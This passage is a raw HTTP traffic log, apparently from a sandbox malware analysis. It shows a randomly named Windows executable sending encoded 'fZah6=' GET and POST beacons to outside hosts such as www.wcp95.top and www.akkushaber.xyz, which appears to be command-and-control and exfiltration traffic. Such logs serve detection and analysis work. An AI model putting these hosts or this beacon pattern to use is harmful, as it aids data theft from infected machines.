fZah6=HRVgR+zE/uQTEk97p5miTUB2UhWSk/koN50vjQpprJq3x2YSAZtMUb6sRt0ugdVodD2mbu/wKeYDtPkRRyhN9pCZOPRnfJ+QE2273IttMumnBfT/s4HWJ0cjRnDIP0CDyvUl5ALj6d8gZeAVNzwae+oZI/UwETfKyrRH5bINrV25apZKfZ3Xn9jD3nj1hP7IQKeX5qRXN5Ac8hNpu+gi8WXNWxtwnlgUyNK8P6VtrKaG/KKVqvilFq4uukuY96y96zvrRmr1e9JvkPDY/BwofuKWhMtkn4UYdgYx5JPBS1fxSYEsQ2nh4S1qIQjKHf4gWMbFqfRbvRXP71DdtJy1pq/chY8W1Dq9N9IiXoKmspQTGcZ0e2mdHfAMm6bIxPbOvOLQ4MlwogEt3pEDbOIrDTuVGkA9WJ+f2OxPeuEKnQcVyqjSqJISUL8eRe5HCRoDG4rTNNvOYcZSo6dEsAgZTvtLD2jHegkj9gOtY6+nPEglAnDyFcECHbnC+nJVsoDhZyXMEtFN1TqkwOOSXOL/JYiCkHXE5CU38U1tLIY2GzoCKHFZ/C/aKBdiLIljT6UgM0eiY1Pfxrmwymr0pEW1d/5v26Qmehg4TaV3QV0YqxzOx27hHn8DDpEXMVhsIu9aM/ZQGZnc0GV5PXmy2Lb4CJZ9XZIEbzqDHBsJmsUmgZDYppXZ7/TldL3krVZ3tPwpdLXrMSM1hLbei8sebeMVipiANNV6bwoDgAtNkzEPk97ZMySSgorLX8aEk1CS63iSnfnzptY6DGfyRbBNNv4G+p7cJW9UmfeLk055d8bbGlec5wEwxOHHFnKCVDsmbGK3nxRk+8fHvRtGSBxvm56v8r5ikuM00DRPl1Lqjf4GlvZxdADVarRKyJIoiHA0JyRflZHvXkcGTDPcXLIeakk19PHHALI40BVUyqVSUl3r7xN07Nuzaj/yp6jSBRxjvOwqJyL/c57D75S+fXHYvFWoUovU/S8DNVKIxxpH2X5bdq5cvv [TRUNCATED]
Nov 11, 2024 06:53:21.489464045 CET	707	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 05:53:21 GMT Content-Type: text/html Content-Length: 564 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	50057	38.55.215.72	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:53:23.240060091 CET	517	OUT	GET /fmne/?42T8f=ABwh0lAHdJnXMBd&fZah6=KT9ASLL7nshZG3MA1LywRmktUAzm0MonJvohshJAkYyq/X4JJvhRXZaeRtgNm/hpfh3HE8zpNq8ggvV/Ig5z2ZvxJO0/GJu4PVG82LAWI/PjCbr5iIHKPVw= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.7nz4.xyz User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Nov 11, 2024 06:53:24.020704031 CET	707	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 05:53:23 GMT Content-Type: text/html Content-Length: 564 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	50058	154.23.184.95	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:53:29.415565014 CET	766	OUT	POST /x8cs/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 202 Connection: close Host: www.wcp95.top Origin: http://www.wcp95.top Referer: http://www.wcp95.top/x8cs/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 57 68 54 78 42 4e 4f 57 4f 4c 6a 55 51 66 41 61 32 65 65 51 61 35 50 35 4d 5a 4f 65 71 6d 71 50 36 38 4b 7a 2b 71 2f 45 73 6f 54 33 6b 32 49 34 4b 64 71 6c 7a 39 69 4f 31 67 45 46 43 6e 4d 61 37 5a 6b 66 4c 74 72 42 49 50 75 33 77 4c 6b 62 41 55 41 63 74 6e 35 79 62 53 6c 66 4e 5a 67 77 56 61 4e 6d 49 51 65 4d 42 74 4b 4e 78 69 46 4b 31 65 53 52 48 6c 44 61 4f 6f 79 6b 35 70 72 74 4d 6b 5a 70 57 67 4c 48 4a 53 52 4e 46 39 7a 55 75 77 58 4f 77 4e 55 6b 6e 30 37 4d 6f 41 67 68 30 67 4b 52 2b 55 79 53 6d 51 61 6e 31 50 79 67 73 34 4a 4c 71 4f 46 71 72 61 44 2f 6f 42 6e 58 46 41 3d 3d Data Ascii: fZah6=WhTxBNOWOLjUQfAa2eeQa5P5MZOeqmqP68Kz+q/EsoT3k2I4Kdqlz9iO1gEFCnMa7ZkfLtrBIPu3wLkbAUActn5ybSlfNZgwVaNmIQeMBtKNxiFK1eSRHlDaOoyk5prtMkZpWgLHJSRNF9zUuwXOwNUkn07MoAgh0gKR+UySmQan1Pygs4JLqOFqraD/oBnXFA==
Nov 11, 2024 06:53:30.214874029 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 05:53:30 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a747c1-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	50059	154.23.184.95	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:53:31.967649937 CET	786	OUT	POST /x8cs/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 222 Connection: close Host: www.wcp95.top Origin: http://www.wcp95.top Referer: http://www.wcp95.top/x8cs/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 57 68 54 78 42 4e 4f 57 4f 4c 6a 55 52 2f 51 61 31 34 57 51 59 5a 50 36 51 70 4f 65 6c 47 71 44 36 38 4f 7a 2b 6f 54 75 76 61 48 33 6b 54 73 34 59 75 79 6c 30 39 69 4f 36 41 45 4d 66 33 4d 4e 37 5a 70 6f 4c 73 6e 42 49 50 53 33 77 50 6f 62 42 6a 55 64 72 33 35 30 54 79 6b 35 4a 5a 67 77 56 61 4e 6d 49 51 4c 58 42 73 69 4e 74 43 56 4b 33 2f 53 57 4b 46 44 56 4a 6f 79 6b 39 70 72 70 4d 6b 5a 4c 57 69 2f 2b 4a 55 64 4e 46 39 44 55 75 6b 44 50 6c 39 55 75 36 6b 36 31 70 53 6c 35 31 43 69 65 2b 48 32 77 74 6b 4b 43 30 4a 2f 36 39 4a 6f 63 34 4f 68 5a 32 64 4b 4c 6c 43 61 65 65 48 70 49 31 77 77 2f 59 42 6c 33 58 39 4a 55 53 69 39 30 74 4e 45 3d Data Ascii: fZah6=WhTxBNOWOLjUR/Qa14WQYZP6QpOelGqD68Oz+oTuvaH3kTs4Yuyl09iO6AEMf3MN7ZpoLsnBIPS3wPobBjUdr350Tyk5JZgwVaNmIQLXBsiNtCVK3/SWKFDVJoyk9prpMkZLWi/+JUdNF9DUukDPl9Uu6k61pSl51Cie+H2wtkKC0J/69Joc4OhZ2dKLlCaeeHpI1ww/YBl3X9JUSi90tNE=
Nov 11, 2024 06:53:32.765852928 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 05:53:32 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a747c1-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	50060	154.23.184.95	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:53:34.507375956 CET	10868	OUT	POST /x8cs/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Connection: close Host: www.wcp95.top Origin: http://www.wcp95.top Referer: http://www.wcp95.top/x8cs/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 57 68 54 78 42 4e 4f 57 4f 4c 6a 55 52 2f 51 61 31 34 57 51 59 5a 50 36 51 70 4f 65 6c 47 71 44 36 38 4f 7a 2b 6f 54 75 76 61 66 33 6e 6c 67 34 4a 2b 4f 6c 31 39 69 4f 7a 67 45 4a 66 33 4e 50 37 5a 42 73 4c 73 62 52 49 4a 57 33 7a 73 67 62 55 6d 6f 64 6c 33 35 30 4d 43 6b 74 4e 5a 67 35 56 63 74 39 49 51 62 58 42 73 69 4e 74 45 78 4b 7a 75 53 57 5a 56 44 61 4f 6f 79 6f 35 70 72 42 4d 69 78 78 57 69 72 75 4b 6b 39 4e 46 5a 76 55 74 52 58 50 6e 64 55 67 35 6b 36 45 70 54 5a 59 31 43 2f 76 2b 45 71 4b 74 6a 36 43 33 6f 65 63 68 37 63 2f 69 76 42 65 31 73 53 44 67 44 36 66 54 32 56 33 79 42 64 68 50 79 6b 55 58 71 70 62 41 43 4e 6b 33 64 6e 6d 46 41 34 59 79 76 30 70 64 55 64 6a 52 41 72 69 30 78 48 63 46 67 64 35 4a 52 51 6d 63 77 4b 41 2b 47 30 36 56 53 53 74 46 38 37 48 56 53 6d 69 51 6a 6c 76 59 7a 35 5a 30 58 53 42 50 53 57 37 63 4e 74 4a 31 4c 5a 2f 7a 6c 66 54 6a 48 75 2b 36 45 57 41 2b 34 69 69 43 31 37 61 6c 47 76 69 49 71 64 48 33 72 38 33 62 4b 58 4f 59 57 77 77 50 56 6d 38 [TRUNCATED] Data Ascii: fZah6=WhTxBNOWOLjUR/Qa14WQYZP6QpOelGqD68Oz+oTuvaf3nlg4J+Ol19iOzgEJf3NP7ZBsLsbRIJW3zsgbUmodl350MCktNZg5Vct9IQbXBsiNtExKzuSWZVDaOoyo5prBMixxWiruKk9NFZvUtRXPndUg5k6EpTZY1C/v+EqKtj6C3oech7c/ivBe1sSDgD6fT2V3yBdhPykUXqpbACNk3dnmFA4Yyv0pdUdjRAri0xHcFgd5JRQmcwKA+G06VSStF87HVSmiQjlvYz5Z0XSBPSW7cNtJ1LZ/zlfTjHu+6EWA+4iiC17alGviIqdH3r83bKXOYWwwPVm8trO/0DbpLmvyyPiuJWmaO/1ZriMuVNA+BVlL9tH2/EmNRDa+SiVcNlxisN7tFLJ2FvhX8VsjtnyxUUbDw7yn3apNTx6EhKyS49JaR1L8ybo+JACvQ2CJ/c/h1dhqSj8Bf/BIf5FDOpvmE8T1ep9M2xm3PTpCTTX/w9jEuYtyJN+4rMXBIlmJ0gF8MLB0YmxfwJc1FkcbAKwgJA9dMJEb79ic3KWH0lDJrD/1np1qL+MWUvI9t7B7+TRqoCjtB4e1fW56KDz3EoXEaF+3K2+L/AdxsRlvsULhCuO2hf+xFN8MSD/GJLDj3gqoZcw+KaXeaMM8a2I36uG7jgvYP4wpbzDE0iJSbk6BjG2y2GVJigP8EoQwR3VNeRGkpuYjH+cBnbNtBtuoDZrbxgAt2lV3xnoqrRVy8Kg7Q0wLovYaBMriFrumukJyGEPfLQxP7MOL0TqKDyVMbF7OQ0P3jHp/tkeqtyyyL4/lBXHRE7xb9LEUTTJwpGaPG+Us3LgM5pWBRsB4DVonvo+wun79/glEsqUpXcWhTJ1sA4OVCecTaUvP80ze4bKgOnPZ2jrTeptKsl+WiQx9frd99ExAMRMJwAfcDhA92Nf9P7LPt2q3bsJd/ornM5Zien0b4M3SuuDvF3JpqjuBSUwa/kBnQfMO9Hs5dT9Kea33Ro [TRUNCATED]
Nov 11, 2024 06:53:35.308845043 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 05:53:35 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a747c1-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	50061	154.23.184.95	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:53:37.051178932 CET	518	OUT	GET /x8cs/?fZah6=bj7RC6TSXqG0XZdA36atdanyU4qMo2uf9tu81Jz1rZWpiEIrMua+i+fZ8jkzZnBN7K16BubLDLaDoM8eXU5kjEJcS1M5B544eLAADTP2O+nB8SN15NaKPxM=&42T8f=ABwh0lAHdJnXMBd HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.wcp95.top User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Nov 11, 2024 06:53:37.853766918 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 05:53:37 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a747c1-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	50062	172.67.217.176	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:53:43.143295050 CET	781	OUT	POST /x784/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 202 Connection: close Host: www.akkushaber.xyz Origin: http://www.akkushaber.xyz Referer: http://www.akkushaber.xyz/x784/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 2b 33 5a 78 4a 38 66 4b 63 5a 50 2b 61 65 35 78 46 6d 44 66 39 7a 46 75 70 32 4d 51 46 48 48 61 31 48 4a 39 41 64 77 4f 53 65 32 64 62 4a 74 74 38 58 67 56 53 45 79 4b 62 78 65 72 43 6d 42 6a 5a 47 4f 74 4f 69 6e 4c 32 73 58 41 47 67 31 65 74 72 57 46 32 4d 57 69 68 62 42 4b 66 32 76 62 75 7a 67 6a 6b 33 56 34 34 47 52 66 6a 55 6d 56 4a 46 4f 53 31 4f 33 39 36 43 45 46 61 4f 30 47 4d 43 4d 6d 46 75 73 55 68 4d 33 2f 4e 34 4e 68 4c 48 6e 36 67 37 74 50 78 71 77 75 65 4d 70 54 2f 47 32 4f 33 74 78 47 42 53 58 50 30 42 4b 31 4b 43 58 65 33 70 6c 41 61 43 41 65 57 4b 6e 45 6d 77 3d 3d Data Ascii: fZah6=+3ZxJ8fKcZP+ae5xFmDf9zFup2MQFHHa1HJ9AdwOSe2dbJtt8XgVSEyKbxerCmBjZGOtOinL2sXAGg1etrWF2MWihbBKf2vbuzgjk3V44GRfjUmVJFOS1O396CEFaO0GMCMmFusUhM3/N4NhLHn6g7tPxqwueMpT/G2O3txGBSXP0BK1KCXe3plAaCAeWKnEmw==
Nov 11, 2024 06:53:43.734839916 CET	1236	IN	HTTP/1.1 302 Found Date: Mon, 11 Nov 2024 05:53:43 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://lirik.xyz/ cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zfdmrKCaFPtEK0nm8wmvbU2j3wpW9%2FXFUzkyJ1bzqB8nZuGouM%2Bt7nwEGCbK5UXwewBIiEiiTbaNuCVfxx%2BrsRoNy1PbMbmNsfYCEMSAwJxNHA1envVzcIu924%2BfDnNX3hGiJzg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0c0606dc064308-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1173&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=781&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 61 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 [TRUNCATED] Data Ascii: 2ab<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px
Nov 11, 2024 06:53:43.734891891 CET	297	IN	Data Raw: 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d Data Ascii: ; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been tem

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	50063	172.67.217.176	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:53:45.698045969 CET	801	OUT	POST /x784/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 222 Connection: close Host: www.akkushaber.xyz Origin: http://www.akkushaber.xyz Referer: http://www.akkushaber.xyz/x784/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 2b 33 5a 78 4a 38 66 4b 63 5a 50 2b 63 37 70 78 4a 6e 44 66 36 54 46 70 6c 57 4d 51 50 6e 48 65 31 48 31 39 41 5a 49 65 56 6f 4f 64 59 6f 64 74 75 47 67 56 56 45 79 4b 51 52 65 71 66 57 42 65 5a 47 53 66 4f 6e 6e 4c 32 73 44 41 47 67 6c 65 74 63 36 47 6b 4d 57 67 34 4c 42 4d 52 57 76 62 75 7a 67 6a 6b 7a 38 56 34 47 35 66 69 67 61 56 49 6d 57 54 71 